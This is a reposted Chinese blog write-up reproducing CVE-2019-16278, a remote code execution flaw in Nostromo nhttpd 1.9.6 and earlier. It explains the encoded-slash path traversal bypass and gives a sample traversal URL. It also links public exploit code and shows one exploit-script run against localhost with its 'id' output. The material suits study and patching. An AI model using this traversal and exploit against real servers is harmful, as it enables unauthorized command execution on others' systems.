碼上快樂

相關內容    簡體    繁體

[漏洞復現]:CVE-2019-16278 Nostromo web server RCE

本文轉載自   查看原文   2019-10-23 19:09   769    web安全/ RCE

漏洞描述

Nostromo web server(nhttpd)是一個開源的web服務器,在Unix系統非常流行。

漏洞原因是web服務在對URL進行檢查是在URL被解碼前,攻擊者可以將/轉換為%2f就可繞過檢查,之前出現過類似漏洞CVE-2011-0751,POC如下:

http://www.example.org/..%2flogs/access_log

利用前提

Nostromo version <= 1.9.6

漏洞復現

Python POC:https://github.com/sudohyak/exploit/blob/master/CVE-2019-16278/exploit.py

mark@mark-Pc:~/nhttpd-exploits$ ./CVE-2019-16278.sh 127.0.0.1 80 id
uid=1000(mark) gid=1000(mark) groups=1000(mark),0(root)

EXP: https://git.sp0re.sh/sp0re/Nhttpd-exploits

參考

https://www.sudokaikan.com/2019/10/cve-2019-16278-unauthenticated-remote.html?utm_source=webcode.ca&utm_medium=web&utm_campaign=twitter
https://nosec.org/home/detail/3074.html


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 CVE-2019-16278-Nostromo Web Server遠程代碼執行 【Vulhub】CVE-2019-3396 Confluence RCE漏洞復現 [漏洞復現] CVE-2019-11043 PHP-FPM RCE Windows RDP的RCE漏洞分析和復現(CVE-2019-0708) CVE-2019-12409 Apache Solr RCE 漏洞復現利用 CVE-2020-0796漏洞復現(RCE) CVE-2019-5475:Nexus2 yum插件RCE漏洞復現 【漏洞復現】CVE-2021-22205 GitLab 未授權RCE CVE-2019-0708漏洞復現 CVE-2019-17558漏洞復現
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM